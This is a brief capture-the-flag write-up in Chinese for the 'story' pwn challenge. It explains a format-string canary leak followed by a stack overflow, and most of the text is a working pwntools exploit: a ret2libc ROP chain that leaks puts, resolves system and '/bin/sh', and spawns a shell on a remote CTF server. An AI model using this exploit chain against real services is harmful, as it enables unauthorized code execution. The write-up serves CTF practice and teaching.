pwn
0x01 story
保护
开启了NX,canary
题目分析
明显的格式化字符漏洞,用来泄露canary的值,直观思路
v1控制写入s的数量,可以控制v1使s溢出,控制ret返回puts,泄露某个函数地址,计算出libc基址,算出system,str_bin_sh。再次溢出,getshell。
# -*- coding:utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
context(os='linux', arch='amd64', log_level='debug')
p=remote("ctf1.linkedbyx.com",10025)
elf = ELF("./story")
pop_rdi=0x0000000000400bd3
read_got=elf.got["read"]
put_plt=elf.plt["puts"]
main=0x400876
p.sendlineafter("ID:","%15$p")#泄露出canary值
p.recvuntil("Hello ")
s=int(p.recvuntil("00"),16)
print hex(s)
#-------------------------------------------------------------
p.sendlineafter("Tell me the size of your story:\n",str(129))#yichu
pay = "a"*136+p64(s)+"a"*8+p64(pop_rdi)
pay+=p64(elf.got["puts"])+p64(elf.plt["puts"])+p64(main)
p.sendlineafter("can speak your story:\n",pay)
puts_addr = u64(p.recv(6).ljust(8, "\x00"))
print hex(puts_addr)
libc = LibcSearcher("puts" , puts_addr)
libc_base = puts_addr - libc.dump("puts")
system = libc_base + libc.dump("system")
str_bin_sh = libc_base + libc.dump("str_bin_sh")
#-------------------------------------------------------------
p.sendlineafter("ID:","%15$p")#泄露出canary值
p.recvuntil("Hello ")
s=int(p.recvuntil("00"),16)
print hex(s)
p.sendlineafter("Tell me the size of your story:\n",str(129))#yichu
pay = "a"*136+p64(s)+"a"*8+p64(pop_rdi)
pay+=p64(str_bin_sh)+p64(system)
p.sendlineafter("You can speak your story:\n",pay)
p.interactive()